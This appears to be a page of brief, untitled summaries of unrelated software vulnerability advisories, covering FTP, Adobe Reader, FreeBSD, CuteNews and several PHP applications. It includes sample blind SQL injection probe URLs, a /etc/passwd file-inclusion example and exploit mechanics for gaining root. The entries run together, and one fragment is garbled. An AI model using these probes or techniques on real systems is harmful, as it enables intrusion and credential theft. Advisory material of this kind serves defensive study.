A remote buffer overflow vulnerability exists in PCMan FTP Server 2.0.7. The vulnerability is caused due to a boundary error within the handling of FTP commands. This can be exploited to cause a stack-based buffer overflow by sending an overly long, specially-crafted FTP command to the affected server. Successful exploitation may allow execution of arbitrary code.
This exploit is used to download the Web.config file from the target server. It uses Padbuster, a great tool developed by Brian Holyfield, to exploit the Padding Oracle Attack vulnerability. It works by fuzzing the encrypted bytes and checking the response of the server. If the response matches the encrypted sample, the Web.config file is downloaded.
Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected. This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X. As can be seen from the above, we control the value in eax (in this case 12010, the length of the acrobat:// + the 12000 A's). This allows us to write the null byte anywhere in memory between ebp-0x420 (0xBFFFE4E8) and the end of the stack. The behaviour may be leveraged to modify the frame pointer, changing the execution flow and thus permitting arbitrary code execution in the context of the user running the affected application.
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user. Input passed to the 'id' parameter in index.php is not properly verified before being used to sql query. This can be exploited thru the web browser and get the hash password from users. SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filtration.
CuteNews is vulnerable to local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious page parameter. The malicious page parameter can be used to include local files from the web server. For example, an attacker can send a crafted HTTP request with page parameter set to /etc/passwd to include the content of the /etc/passwd file.
The stage parameter is not properly sanitized, allowing an attacker to read arbitrary files on the server.
This exploit is for FreeBSD 7.0 - 7.2 and is based on a null pointer dereference vulnerability. The exploit involves overwriting the ts_lock.mtx_lock with SYSENT8_SYSCALL_ADDR and then calling kernel_code() which sets the UID to 0 and gives root access.
$_GET["nodeId"] isn't sanitized before executing the database query. An attacker can use this for a blind SQL injection attack. URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms
The showlang parameter of DNET Live-Stats 0.8 does not properly sanitize user input, allowing an attacker to read arbitrary files on the server.
A SQL Injection vulnerability was found in FAQMasterFlex, a software used as one of Fantastico auto-install software package in F.A.Q software section. The vulnerability exists in the faq.php file, where user input is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious SQL query in the 'cat_name' and 'category_id' parameters.
Services By CQR